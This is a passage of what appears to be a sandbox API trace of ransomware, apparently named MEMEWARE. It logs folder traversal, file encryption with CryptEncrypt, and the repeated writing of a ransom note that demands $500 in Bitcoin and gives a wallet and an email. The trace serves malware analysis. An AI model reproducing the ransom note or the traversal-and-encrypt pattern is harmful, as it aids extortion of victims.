lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.114] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.114] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.114] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.114] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.114] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.114] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\.") returned 53 [0072.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.114] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.115] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.115] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.115] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.115] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.115] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.115] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\..") returned 54 [0072.115] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.115] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.115] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.115] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.115] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt") returned 69 [0072.115] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\queue\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.115] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.115] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.116] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.116] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.116] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.116] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.116] CloseHandle (hObject=0xd4) returned 1 [0072.116] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="Windows") returned -1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="Program Files") returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="Program Files (x86)") returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="$Recycle.bin") returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="System Volume Information") returned -1 [0072.116] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0072.116] lstrcmpW (lpString1="SentItems", lpString2=".") returned 1 [0072.116] lstrcmpW (lpString1="SentItems", lpString2="..") returned 1 [0072.116] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned 57 [0072.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.116] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.116] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.116] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.117] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.117] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\.") returned 57 [0072.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.117] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\..") returned 58 [0072.117] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.117] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.117] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt") returned 73 [0072.117] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\sentitems\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.126] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.126] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.127] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.127] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.127] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.127] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.127] CloseHandle (hObject=0xd4) returned 1 [0072.127] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="Windows") returned -1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files") returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files (x86)") returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="$Recycle.bin") returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="System Volume Information") returned 1 [0072.127] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 58 [0072.127] lstrcmpW (lpString1="VirtualInbox", lpString2=".") returned 1 [0072.127] lstrcmpW (lpString1="VirtualInbox", lpString2="..") returned 1 [0072.127] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned 60 [0072.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.128] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.128] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.128] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.128] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\.") returned 60 [0072.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.128] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.128] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\..") returned 61 [0072.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.128] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0072.128] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 64 [0072.128] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0072.128] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0072.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned 66 [0072.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0072.448] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.448] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.448] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.448] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.448] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.448] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\.") returned 66 [0072.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.448] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.448] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.448] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.448] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\..") returned 67 [0072.448] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.448] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.448] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Windows") returned -1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files") returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files (x86)") returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="$Recycle.bin") returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="System Volume Information") returned 1 [0072.448] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 79 [0072.448] StrStrIW (lpFirst="WelcomeFax.tif", lpSrch=".protected") returned 0x0 [0072.449] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="RESTORE_FILES.txt") returned 1 [0072.449] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.449] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.449] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0072.449] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0072.449] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt") returned 82 [0072.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0072.451] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.451] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0072.454] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.454] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0072.454] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.454] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0072.454] CloseHandle (hObject=0xd8) returned 1 [0072.454] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.454] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.454] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt") returned 76 [0072.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.455] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.455] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.456] lstrlenA 